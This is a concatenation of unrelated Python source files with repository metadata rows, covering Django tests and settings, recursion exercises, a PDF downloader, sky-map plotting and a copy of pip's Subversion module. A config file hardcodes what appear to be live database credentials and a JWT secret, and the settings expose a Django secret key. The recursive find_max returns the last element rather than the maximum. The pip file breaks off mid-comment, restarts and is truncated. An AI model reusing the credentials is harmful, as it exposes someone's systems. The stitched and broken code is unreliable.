def test_mission_api_cancel_mission(self):
model = OitsParams()
model.description = 'description'
model.parameters = esa_mission
model.status = 'P'
model.readonly = False
model.save()
client = Client()
response = client.post('/api/mission/{0}/cancel/'.format(model.id), format='json')
self.assertEqual(response.status_code, 200)
json.loads(response.content)
new_model = OitsParams.objects.get(pk=model.id)
self.assertEqual('A', new_model.status)
|
[
"wingchung@justinhui.co.uk"
] |
wingchung@justinhui.co.uk
|
8c062e751ab73fde9873852eeeb5f544c18b3104
|
3cb01b6018abead83e2d85e4ce5e49064ff2a476
|
/algorithms/recursion.py
|
f2f7d14b7a4aef2f2f93292d7597392b129cb25a
|
[] |
no_license
|
mkrotos/Algorithms
|
a73af4366f83ffeed5f54a3419ecfaa11af12603
|
74e768056137feedd27f89bbfffe051c0f5ae606
|
refs/heads/master
| 2022-12-20T09:51:13.526257
| 2020-10-24T15:40:57
| 2020-10-24T15:40:57
| 300,725,451
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 927
|
py
|
from typing import List
def sum(arr: List) -> int:
"""
Sums elements in list using recursive algorithm
:param arr: list of numbers
:return: sum
"""
if len(arr) == 1:
return arr[0]
else:
return arr[0] + sum(arr[1:])
def count_elements_in_list(arr: List) -> int:
"""
Counts number of elements in list using recursive algorithm
:param arr: list of any elements
:return: number of elements
"""
if not arr:
return 0
else:
return 1 + count_elements_in_list(arr[1:])
def find_max(arr: List) -> int:
"""
Finds max number in the list using recursive algorithm
:param arr: list of numbers
:return: max element
"""
return _find_max_recursion_case(arr, 0)
def _find_max_recursion_case(arr: List, max: int) -> int:
if not arr:
return max
else:
return _find_max_recursion_case(arr[1:], arr[0])
|
[
"mar.krotos@gmail.com"
] |
mar.krotos@gmail.com
|
929f37b2eebd4b61f549ed641f8bc2cd109b15ac
|
7f3b0003e08af2419d79379134711323dc18a9da
|
/music_server/music_server/wsgi.py
|
e60195fe47efa28d1aaa7b8dd089580862d41a68
|
[
"MIT"
] |
permissive
|
slaymaker1907/baeuler
|
ae3fe9fb56039a69cdb410144d5d9e1c01b31918
|
4432e2dd57327bc5c8364b678e55fe27beaf1d9c
|
refs/heads/master
| 2020-05-18T05:46:14.895961
| 2019-04-30T08:00:04
| 2019-04-30T08:00:04
| 184,217,196
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
"""
WSGI config for music_server project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'music_server.settings')
application = get_wsgi_application()
|
[
"dyllongagnier@gmail.com"
] |
dyllongagnier@gmail.com
|
b117ccbe2437fb59e44290805d563592bc806910
|
8f875bfd80bad1e2dbfa5648c8592141ad4fb711
|
/Ciclo1/210701/ej_csv2.py
|
c5b804352bd953efccd9949c6b1d05af8e816cb8
|
[] |
no_license
|
gonsan20/misiontic
|
02b4a2ed33559d35e1e12d9de391d19b59409fbb
|
8bceb0d0c4c8aeb6b26aae1e2f71b8432dc097c1
|
refs/heads/main
| 2023-06-16T18:19:52.773514
| 2021-07-13T22:58:17
| 2021-07-13T22:58:17
| 371,520,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
import csv
file_name="Tabla.csv"
with open(file_name, 'a', newline='') as csv_file:
escribir=csv.writer(csv_file)
escribir.writerows([['Egipto', 'El cairo'], ['Colombia','Bogota'], ["Australia", "Canberra"]])
|
[
"gonsan20@gmail.com"
] |
gonsan20@gmail.com
|
c4714273a7eb876e037c79b842099ba9120680eb
|
43d9cfd2ba21cb96b5af0b6912b33404ca89c898
|
/config.py
|
499bd9f2da827f03926cc801a60b7866233727b2
|
[] |
no_license
|
ulods123/imdb-backend
|
ed2ca3dc4e24f4b2b613475e9222fc79ac79526c
|
fdc2e383f00d881292a8dd62c3f863fe157153f1
|
refs/heads/main
| 2023-03-19T06:12:32.446269
| 2021-03-09T08:15:04
| 2021-03-09T08:15:04
| 345,031,980
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 265
|
py
|
class Config:
class Database:
USER='sql6397037'
PASSWORD='P6mwKRcq4A'
SERVER_NAME='sql6.freemysqlhosting.net'
PORT=3306
DATABASE_NAME='sql6397037'
class JWT:
SECRET_KEY='4Mk08YGLxdaL'
ALGORITHM='HS512'
|
[
"urvish.lodaria@thinkanalytics.in"
] |
urvish.lodaria@thinkanalytics.in
|
aea1aac4ec02bd6df8afee1dda259248995ba532
|
5a9b0efdf7932043537570198cf6003e3aa52cdf
|
/blog_project/settings.py
|
a65847da222c4cc8c0b81d7df8d0c4dfc0e8879a
|
[] |
no_license
|
zhangjinsi/blog_project
|
c68fe9602982931b363291cdcd534574b747a465
|
8a18c54f3b36cef6c24828079ccf5e01dea5331e
|
refs/heads/master
| 2021-07-09T00:06:24.534526
| 2017-10-09T06:39:30
| 2017-10-09T06:39:30
| 106,245,599
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,783
|
py
|
#coding=utf-8
"""
Django settings for blog_project project.
Generated by 'django-admin startproject' using Django 1.8.18.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+^hqxwb^4_@7!wkv06!v%61+=-2x%8e7tt2)l*rv!jsx14_g0l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'blog_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'blog.views.global_setting'
],
},
},
]
WSGI_APPLICATION = 'blog_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'blogdb',
'USER': 'root',
'PASSWORD': 'root',
'HOST': '',
'PORT': '',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
MEDIA_URL = '/uploads/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'uploads')
#自定义用户model
AUTH_USER_MODEL = 'blog.User'
#网站的基本信息配置
SITE_NAME = '张进思的个人博客'
SITE_DESC = '专注Python开发,欢迎和大家交流'
WEIBO_SINA = 'http://weibo.sina.com'
WEIBO_TENCENT = 'http:weibo.qq.com'
PRO_RSS = 'http://www.baidu.com'
PRO_EMAIL = '270121263@qq.com'
# 自定义日志输出信息
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format': '%(asctime)s [%(threadName)s:%(thread)d] [%(name)s:%(lineno)d] [%(module)s:%(funcName)s] [%(levelname)s]- %(message)s'} #日志格式
},
'filters': {
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'include_html': True,
},
'default': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename': 'log/all.log', #日志输出文件
'maxBytes': 1024*1024*5, #文件大小
'backupCount': 5, #备份份数
'formatter':'standard', #使用哪种formatters日志格式
},
'error': {
'level':'ERROR',
'class':'logging.handlers.RotatingFileHandler',
'filename': 'log/error.log',
'maxBytes':1024*1024*5,
'backupCount': 5,
'formatter':'standard',
},
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
'request_handler': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename': 'log/script.log',
'maxBytes': 1024*1024*5,
'backupCount': 5,
'formatter':'standard',
},
'scprits_handler': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename':'log/script.log',
'maxBytes': 1024*1024*5,
'backupCount': 5,
'formatter':'standard',
}
},
'loggers': {
'django': {
'handlers': ['default', 'console'],
'level': 'DEBUG',
'propagate': False
},
'django.request': {
'handlers': ['request_handler'],
'level': 'DEBUG',
'propagate': False,
},
'scripts': {
'handlers': ['scprits_handler'],
'level': 'INFO',
'propagate': False
},
'blog.views': {
'handlers': ['default', 'error'],
'level': 'DEBUG',
'propagate': True
},
}
}
|
[
"2128265547@qq.com"
] |
2128265547@qq.com
|
6156d0dbcdc91a34293ace79598f6aefefc0072c
|
feaad3e97bd5940b94cdce8307b8469b5d04364c
|
/utils.py
|
fb21f48b2d9ae76051fea420285870bcc0efe512
|
[] |
no_license
|
Amirparsa-Sal/Telegram-chat-analyzer
|
cb8b51b3361bb94ee9bc4af37c210626f52421f6
|
fcd12e6ca0d81043154d79bf463cdb7b23afb8f7
|
refs/heads/master
| 2022-12-26T18:42:46.030861
| 2020-10-03T00:37:45
| 2020-10-03T00:37:45
| 295,259,123
| 9
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,694
|
py
|
import time
def merge(arr,start,mid,end,corresponding_arr=None):
if corresponding_arr == None:
corresponding_arr = arr
new_arr = []
corr_new_arr = []
left_pivot = start
right_pivot = mid + 1
while left_pivot!=mid+1 and right_pivot!=end+1:
if arr[left_pivot]<arr[right_pivot]:
new_arr.append(arr[left_pivot])
corr_new_arr.append(corresponding_arr[left_pivot])
left_pivot += 1
else:
new_arr.append(arr[right_pivot])
corr_new_arr.append(corresponding_arr[right_pivot])
right_pivot += 1
if left_pivot == mid+1:
for i in range(right_pivot,end+1):
new_arr.append(arr[i])
corr_new_arr.append(corresponding_arr[i])
else:
for i in range(left_pivot,end+1):
new_arr.append(arr[i])
corr_new_arr.append(corresponding_arr[i])
for i in range(end-start+1):
arr[start+i] = new_arr[i]
corresponding_arr[start+i] = corr_new_arr[i]
def merge_sort(arr, start, end, corresponding_arr=None):
if start == end:
return
mid = (start + end)//2
merge_sort(arr,start,mid,corresponding_arr)
merge_sort(arr,mid+1,end,corresponding_arr)
merge(arr,start,mid,end,corresponding_arr)
def find_date_number(date):
day = int(date[0])
year = int(date[2])
months = {
'January': 31,
'February': 28 + int(year%4==0),
'March': 31,
'April': 30,
'May': 31,
'June': 30,
'July': 31,
'August': 31,
'September': 30,
'October': 31,
'November': 30,
'December':31,
}
date_number = 0
for month, days in months.items():
if month == date[1]:
break
date_number += days
date_number += day + year * 365 + year//4
return date_number
|
[
"Amirparsa.s@aut.ac.ir"
] |
Amirparsa.s@aut.ac.ir
|
8a85134a570676adb97b23e45325b032f42b1cf0
|
ab4348843b3d5dc5ef29afda43b9371c64e0fe3c
|
/download.py
|
40a1d37917c4f0043dec106482e22434a74a7f27
|
[] |
no_license
|
khanu263/springer-auto-download
|
23e0f0cc446372d8c4ae07739e30426be69362e6
|
1aa05da7c52541a71962c5634b9c18c522e6c339
|
refs/heads/master
| 2022-04-26T15:52:51.268747
| 2020-04-29T01:16:27
| 2020-04-29T01:16:27
| 259,787,260
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
# download.py
# by Umair Khan
# Imports
import sys
import requests
from bs4 import BeautifulSoup
# Get list of links
links = open(sys.argv[1], "r").read().splitlines()
# Go through each link
for link in links:
# Get the name of the book
html = requests.get(link).text
soup = BeautifulSoup(html, "html.parser")
name = str(soup.h1)[4:-5].strip()
# Produce the filename
name = name.split()
for i in range(len(name)):
name[i] = "".join(x for x in name[i] if x.isalnum())
name[i] = name[i].capitalize()
name = "".join(name)
name = name + ".pdf"
# Get the download link
code = link.split("/")[-1]
url = "https://link.springer.com/content/pdf/{}.pdf".format(code)
# Download and write the file
print("Downloading {}...".format(name), end = "", flush = True)
raw_file = requests.get(url)
open(name, "wb").write(raw_file.content)
print("finished!", flush = True)
|
[
"ukn@comcast.net"
] |
ukn@comcast.net
|
7829c466f26fa0120679a7f491fb837936a2ed43
|
c1bed5203d73a077ff83b96cc6fe71a3fce734e7
|
/python/pe051.py
|
1580b96a9d2d23aaa0492f9402a25e9228eb9f07
|
[] |
no_license
|
arknave/project-euler
|
41006e571e24d8aa077247bdb806be3ba8818c40
|
647783721d4d019c41ec844500069baeab6d8a44
|
refs/heads/master
| 2022-12-23T06:36:14.647022
| 2022-12-14T23:20:49
| 2022-12-14T23:20:49
| 19,319,963
| 0
| 1
| null | 2015-05-21T06:42:41
| 2014-04-30T16:28:50
|
Python
|
UTF-8
|
Python
| false
| false
| 847
|
py
|
from math import ceil, sqrt
CAP = 1000000
def replace(x, a, b):
return int(str(x).replace(str(a), str(b)))
def is_prime(n):
if n % 2 == 0:
return False
for i in range(3, int(ceil(sqrt(n))) + 1, 2):
if n % i == 0:
return False
return True
def main():
for i in xrange(1, CAP, 2):
if not is_prime(i):
continue
rep = i
si = str(i)
for x in xrange(10):
count = 1
sx = str(x)
for y in xrange(x + 1, 10):
sy = str(y)
new = replace(i, x, y)
if sx in si and is_prime(new):
count += 1
rep = min(rep, new)
if count >= 7:
print '----'
print rep, count
if __name__ == '__main__':
main()
|
[
"arnavsastry@gmail.com"
] |
arnavsastry@gmail.com
|
91d3b6fdca909c5fc49a4df17c4eb75ffdb7535b
|
6d8faae66dd6332836bb11d7f02d6867c95d2a65
|
/glast/pointlike/python/uw/like2/pub/display_map.py
|
72aca3d85c05496761ea2c0320817f57cf99b341
|
[] |
no_license
|
Areustle/fermi-glast
|
9085f32f732bec6bf33079ce8e2ea2a0374d0228
|
c51b821522a5521af253973fdd080e304fae88cc
|
refs/heads/master
| 2021-01-01T16:04:44.289772
| 2017-09-12T16:35:52
| 2017-09-12T16:35:52
| 97,769,090
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,663
|
py
|
"""
Manage generation of maps from HEALpix tables
$Header: /glast/ScienceTools/glast/pointlike/python/uw/like2/pub/Attic/display_map.py,v 1.1.2.1 2015/08/13 18:03:10 jasercio Exp $
"""
import os,sys, types, pickle
import numpy as np
import pylab as plt
from uw.utilities import image
from skymaps import Band, SkyDir, PySkyFunction, Hep3Vector, SkyImage
def skyplot(crec, title='', axes=None, fignum=30, ait_kw={}, **kwargs):
""" make an AIT skyplot of a HEALpix array
crec : array
must be sorted according to the HEALpix index
title : string
set the figure title
ait_kw : dict
to set kwargs for image.AIT, perhaps pixelsize
Other args passed to imshow
"""
n = len(crec)
nside = int(np.sqrt(n/12))
assert n==12*nside**2, 'wrong length to be healpix array'
band = Band(nside)
def skyplotfun(v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
index = band.index(skydir)
return crec[index]
if axes is None:
plt.close(fignum)
fig = plt.figure(fignum, figsize=(12,6))
ait=image.AIT(PySkyFunction(skyplotfun) ,axes=axes, **ait_kw)
ait.imshow(title=title, **kwargs)
return ait
class DisplayMap(object):
""" display the contents of a HEALpix table as ait or zea
"""
def __init__(self, table,
sources=None,
imshow_kw=dict(interpolation='bilinear', ),
**kwargs):
"""table : string or iterable
If a string, the name of a pickled file
sources : None or a string
if a string, the name of a pickled rec with name, ra, dec fields
"""
if type(table)==types.StringType:
self.v = pickle.load(open(table))
print 'Loaded HEALpix table from file %s' %table
else: self.v=table
self.nside = int(np.sqrt(len(self.v)/12))
assert len(self.v)==12*self.nside**2, 'size of map not consistent with expected nside %d' % nside
self.band = Band(self.nside)
self.imshow_kw=imshow_kw
self.scale = kwargs.pop('scale', lambda x: x)
if type(self.scale) == types.StringTypes:
if self.scale=='sqrt': self.scale= lambda x: np.sqrt(max(x,0))
elif self.scale=='log': self.scale=lambda x: np.log10(max(x,0.1))
else:
raise Exception, 'unrecognized scale function, %s' %self.scale
self.ZEA_kw = kwargs.pop('ZEA_kw', dict(galactic=True, size=10, pixelsize=0.1))
if sources is not None:
self.sources = pickle.load(open(sources))
print 'loaded %d sources from %s' % (len(self.sources),sources)
else:self.sources=None
self.map_path = kwargs.pop('map_path',None)
def get_pyskyfun(self):
return PySkyFunction(self)
def skyfun(self, v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
return self.v[self.band.index(skydir)]
def __call__(self,v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
t =self.v[self.band.index(skydir)]
return self.scale(t)
def fill_ait(self, fignum=11, axes=None, show_kw={}, source_kw={}, figwidth=12, margin=0.15, **kwargs):
if axes is None:
# set up a figure for 2x1 image with equal margins
plt.close(fignum)
figheight = figwidth*(1.+2*margin)/(1+margin)/2.
fig=plt.figure(fignum, figsize=(figwidth, figheight));
axes=plt.gca()
plt.subplots_adjust(left=0.05, right=0.95) #gives reasonable equal margins
pixelsize = kwargs.pop('pixelsize', 0.25)
ait = image.AIT(self.get_pyskyfun(),axes=axes, pixelsize=pixelsize, **kwargs)
self.imgplot=ait.imshow(**show_kw)
ait.axes.set_autoscale_on(False)
if self.sources is not None:
sdirs = map(SkyDir, self.sources.ra, self.sources.dec)
ait.plot(sdirs, **source_kw)
print 'found %d sources to plot' % len(sdirs)
plt.draw_if_interactive()
return ait
def fill_zea(self, index, fignum=12, axes=None, show_kw=None, **kwargs):
""" index: integer, or a SkyDir
the HP12 index if integer
figmun: integer
used if axes is None
show_kw : dict
override imshow keywords
kwargs
size
pixelsize
galactic
"""
if axes is None:
plt.close(fignum)
fig = plt.figure(fignum,figsize=(6,6));
axes = fig.gca()
if type(index) == types.IntType:
sdir = Band(12).dir(index)
title = 'HP12_%4d'%index
else:
sdir = index
title = 'l = %.1f, b=%.1f' % (sdir.l(), sdir.b())
title = kwargs.pop('title',title)
kw = self.ZEA_kw
kw.update(kwargs)
zea = image.ZEA(sdir, **kw)
zea.grid()
zea.fill(self.get_pyskyfun())
zea.imshow( **(show_kw if show_kw is not None else self.imshow_kw))
zea.colorbar()
if title is not None: axes.set_title(title)
if self.sources is not None:
count = 0
for s in self.sources:
sdir = SkyDir(s.ra,s.dec)
if not zea.inside(sdir):continue
count += 1
inside =self.band.index(sdir)==index
zea.plot_source(s.name, sdir, symbol='*' if inside else 'd',
markersize=14 if inside else 8,
color='w')
print 'found %d sources to plot' %count
if self.map_path is not None:
fout = os.path.join(self.map_path,hpname(index)+'.png')
plt.savefig(fout, bbox_inches='tight')
print 'saved figure to %s' % fout
plt.draw_if_interactive()
return zea
class SourceDensity(object):
""" create source density HEALpix array from a list of locations
"""
def __init__(self, nside=12):
"""
nside: integer
the HEALpix nside parameter
"""
self.v = np.zeros(12*nside**2, float)
self.index = Band(nside).index
def fill(self, sdirs):
""" sdirs: a list of SkyDir objects
"""
for s in sdirs:
self.v[self.index(s)]+=1
def fill_rec(self, rec, cut=None):
""" rec: a recarry with ra, dec columns
cut : None or a mask arrray
"""
if cut is None:
sdirs = map(SkyDir, rec.ra, rec.dec)
else:
sdirs = map(SkyDir, rec.ra[cut], rec.dec[cut])
self.fill(sdirs)
def save(self, fn):
pickle.dump(self.v, open(fn, 'wb'))
print 'saved file %s' % fn
class SourceMap(DisplayMap):
""" subclass of DisplayMap to display point source positions on a photon density map
"""
def __init__(self, kde,
sources ,
show_kw=dict(fun = lambda x:np.sqrt(x/1e6), vmax=4, cmap='hot'),
plot_kw=dict(nocolorbar=False,),
pos=None, size=180,
):
super(SourceMap,self).__init__(kde)
if type(sources) == types.StringType:
self.s = pickle.load(sources)
print 'loaded %5d sources from %s' %(len(self.s), fn)
else: self.s = sources
self.show_kw = show_kw
def fill_ait(self, fignum=20, axes=None, **kwargs):
ait = super(SourceMap, self).fill_ait( fignum=fignum, axes=axes, show_kw= self.show_kw, **kwargs)
ait.axes.set_autoscale_on(False) # prevent rescaling when adding points
self.ait=ait
return ait
def fill_zea(self, pos, fignum=21, axes=None, which=-1, savefn=None, **kwargs):
sfactor = kwargs.pop('sfactor', 1)
zea = super(DMap, self).fill_zea(pos, fignum=fignum, axes=axes, show_kw= self.show_kw, **kwargs)
s = self.s
for subset, marker, color, size, label in self.subsets(s, which):
zea.plot(map(SkyDir, s.ra[subset], s.dec[subset]), edgecolor='grey',
marker=marker, c=color, s=size*sfactor, label=label)
print 'plotted %4d sources, subset "%s"' %(sum(subset), label)
plt.legend(scatterpoints=1, loc=2)
if savefn is not None:
self.savefig(savefn % i); i+=1
return zea
def legend(self):
plt.legend(frameon=False,scatterpoints=1, loc=(-0.05,-0.05))
def savefig(self, fn):
plt.savefig(fn, bbox_inches='tight', pad_inches=0, dpi=160)
def subsets(self, s, which):
assoc = s.id_prob>0.8
ts25=s.ts>=25
lt25=(s.ts<25)
t =(((-assoc)*(lt25),'+', 'grey', 8, 'no id, TS<25'),
((-assoc)*(ts25), 's', 'red', 10, 'no id, TS>25'),
(assoc, 'o', 'green', 12, 'associated' ),
)
return t if which <0 else (t[which],)
def add_sources(self, which=-1, sfactor=1):
s = self.s
print 'loaded %5d sources' %(len(s),)
i=0 if which<0 else which+10
plt.rcParams['legend.fontsize']= 8.0
for subset, marker, color, size, label in self.subsets(s, which):
self.ait.plot(map(SkyDir, s.ra[subset], s.dec[subset]), edgecolor='grey',
marker=marker, c=color, s=size*sfactor, label=label)
print 'plotted %4d sources, subset "%s"' %(sum(subset), label)
self.legend()
def load_skyspect(fn = r'T:\data\galprop\ring_21month_P6v11.fits',
# r'D:\fermi\data\galprop\gll_iem_v02.fit',
nside=192,
show_kw = dict(fun=np.log10, cmap='hot'),
):
"""
load a galactic diffuse distribution.
Save the HEALpix respresentation at an energy (1 GeV default)
fn : string
filename for the FITS representaion of a SKySpectrum
nside: int
HEALpix nside to use for represenation -- note that 192 is 12*16, about 0.25 deg
show_kw : dict
fun: weighting function, cmap, vmin, vmax
"""
t = SkyImage(fn)
galname = os.path.split(fn)[-1]
print '%s: nx, ny, layers: %d %d %d' %(galname, t.naxis1(), t.naxis2(), t.layers())
hpdir = Band(nside).dir
dmap = map(lambda i:t(hpdir(i)), xrange(12*nside**2))
tdm=DisplayMap(dmap)
tdm.fill_ait(fignum=12, source_kw=dict(edgecolor='w',), show_kw=show_kw )
plt.title(galname+' (1 GeV)')
sfn = galname.split('.')[0]+'.png'
plt.savefig(galname.split('.')[0]+'.png', bbox_inches='tight', pad_inches=0)
print 'saved figure to %s' % sfn
return tdm
|
[
"areustledev@gmail.com"
] |
areustledev@gmail.com
|
8941cdffeb217a0bbf08ba75b764b8e67f7d4f94
|
10d77a1bca1358738179185081906956faf3963a
|
/venv/Lib/site-packages/pip/_internal/vcs/subversion.py
|
b56967e6d4cffea7d3234a2fb4f8a2995dd7dd3c
|
[] |
no_license
|
ekansh18/WE_Care_NGO_WEBSITE
|
3eb6b12ae798da26aec75d409b0b92f7accd6c55
|
7c1eaa78d966d13893c38e7157744fbf8f377e71
|
refs/heads/master
| 2023-07-16T07:22:48.920429
| 2021-08-31T04:11:19
| 2021-08-31T04:11:19
| 401,563,669
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,402
|
py
|
# The following comment should be removed at some point in the future.
# mypy: disallow-untyped-defs=False
from __future__ import absolute_import
import logging
import os
import re
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
display_path,
is_console_interactive,
rmtree,
split_auth_from_netloc,
)
from pip._internal.utils.subprocess import make_command
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.vcs.versioncontrol import VersionControl, vcs
_svn_xml_url_re = re.compile('url="([^"]+)"')
_svn_rev_re = re.compile(r'committed-rev="(\d+)"')
_svn_info_xml_rev_re = re.compile(r'\s*revision="(\d+)"')
_svn_info_xml_url_re = re.compile(r'<url>(.*)</url>')
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
from pip._internal.utils.subprocess import CommandArgs
from pip._internal.utils.misc import HiddenText
from pip._internal.vcs.versioncontrol import AuthInfo, RevOptions
logger = logging.getLogger(__name__)
class Subversion(VersionControl):
name = 'svn'
dirname = '.svn'
repo_name = 'checkout'
schemes = ('svn', 'svn+ssh', 'svn+http', 'svn+https', 'svn+svn')
@classmethod
def should_add_vcs_url_prefix(cls, remote_url):
return True
@staticmethod
def get_base_rev_args(rev):
return ['-r', rev]
@classmethod
def get_revision(cls, location):
"""
Return the maximum revision for all files under a given location
"""
# Note: taken from setuptools.command.egg_info
revision = 0
for base, dirs, files in os.walk(location):
if cls.dirname not in dirs:
dirs[:] = []
continue # no sense walking uncontrolled subdirs
dirs.remove(cls.dirname)
entries_fn = os.path.join(base, cls.dirname, 'entries')
if not os.path.exists(entries_fn):
# FIXME: should we warn?
continue
dirurl, localrev = cls._get_svn_url_rev(base)
if base == location:
base = dirurl + '/' # save the root url
elif not dirurl or not dirurl.startswith(base):
dirs[:] = []
continue # not part of the same svn tree, skip it
revision = max(revision, localrev)
return revision
@classmethod
def get_netloc_and_auth(cls, netloc, scheme):
"""
This override allows the auth information to be passed to svn via the
--username and --password options instead of via the URL.
"""
if scheme == 'ssh':
# The --username and --password options can't be used for
# svn+ssh URLs, so keep the auth information in the URL.
return super(Subversion, cls).get_netloc_and_auth(netloc, scheme)
return split_auth_from_netloc(netloc)
@classmethod
def get_url_rev_and_auth(cls, url):
# type: (str) -> Tuple[str, Optional[str], AuthInfo]
# hotfix the URL scheme after removing svn+ from svn+ssh:// readd it
url, rev, user_pass = super(Subversion, cls).get_url_rev_and_auth(url)
if url.startswith('ssh://'):
url = 'svn+' + url
return url, rev, user_pass
@staticmethod
def make_rev_args(username, password):
# type: (Optional[str], Optional[HiddenText]) -> CommandArgs
extra_args = [] # type: CommandArgs
if username:
extra_args += ['--username', username]
if password:
extra_args += ['--password', password]
return extra_args
@classmethod
def get_remote_url(cls, location):
# In cases where the source is in a subdirectory, not alongside
# setup.py we have to look up in the location until we find a real
# setup.py
orig_location = location
while not os.path.exists(os.path.join(location, 'setup.py')):
last_location = location
location = os.path.dirname(location)
if location == last_location:
# We've traversed up to the root of the filesystem without
# finding setup.py
logger.warning(
"Could not find setup.py for directory %s (tried all "
"parent directories)",
orig_location,
)
return None
return cls._get_svn_url_rev(location)[0]
@classmethod
def _get_svn_url_rev(cls, location):
from pip._internal.exceptions import InstallationError
entries_path = os.path.join(location, cls.dirname, 'entries')
if os.path.exists(entries_path):
with open(entries_path) as f:
data = f.read()
else: # subversion >= 1.7 does not have the 'entries' file
data = ''
if (data.startswith('8') or
data.startswith('9') or
data.startswith('10')):
data = list(map(str.splitlines, data.split('\n\x0c\n')))
del data[0][0] # get rid o# The following comment should be removed at some point in the future.
# mypy: disallow-untyped-defs=False
from __future__ import absolute_import
import logging
import os
import re
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
display_path,
is_console_interactive,
rmtree,
split_auth_from_netloc,
)
from pip._internal.utils.subprocess import make_command
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.vcs.versioncontrol import VersionControl, vcs
_svn_xml_url_re = re.compile('url="([^"]+)"')
_svn_rev_re = re.compile(r'committed-rev="(\d+)"')
_svn_info_xml_rev_re = re.compile(r'\s*revision="(\d+)"')
_svn_info_xml_url_re = re.compile(r'<url>(.*)</url>')
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
from pip._internal.utils.subprocess import CommandArgs
from pip._internal.utils.misc import HiddenText
from pip._internal.vcs.versioncontrol import AuthInfo, RevOptions
logger = logging.getLogger(__name__)
class Subversion(VersionControl):
name = 'svn'
dirname = '.svn'
repo_name = 'checkout'
schemes = ('svn', 'svn+ssh', 'svn+http', 'svn+https', 'svn+svn')
@classmethod
def should_add_vcs_url_prefix(cls, remote_url):
return True
@staticmethod
def get_base_rev_args(rev):
return ['-r', rev]
@classmethod
def get_revision(cls, location):
"""
Return the maximum revision for all files under a given location
"""
# Note: taken from setuptools.command.egg_info
revision = 0
for base, dirs, files in os.walk(location):
if cls.dirname not in dirs:
dirs[:] = []
continue # no sense walking uncontrolled subdirs
dirs.remove(cls.dirname)
entries_fn = os.path.join(base, cls.dirname, 'entries')
if not os.path.exists(entries_fn):
# FIXME: should we warn?
continue
dirurl, localrev = cls._get_svn_url_rev(base)
if base == location:
base = dirurl + '/' # save the root url
elif not dirurl or not dirurl.startswith(base):
dirs[:] = []
continue # not part of the same svn tree, skip it
revision = max(revision, localrev)
return revision
@classmethod
def get_netloc_and_auth(cls, netloc, scheme):
"""
This override allows the auth information to be passed to svn via the
--username and --password options instead of via the URL.
"""
if scheme == 'ssh':
# The --username and --password options can't be used for
# svn+ssh URLs, so keep the auth information in the URL.
return super(Subversion, cls).get_netloc_and_auth(netloc, scheme)
return split_auth_from_netloc(netloc)
@classmethod
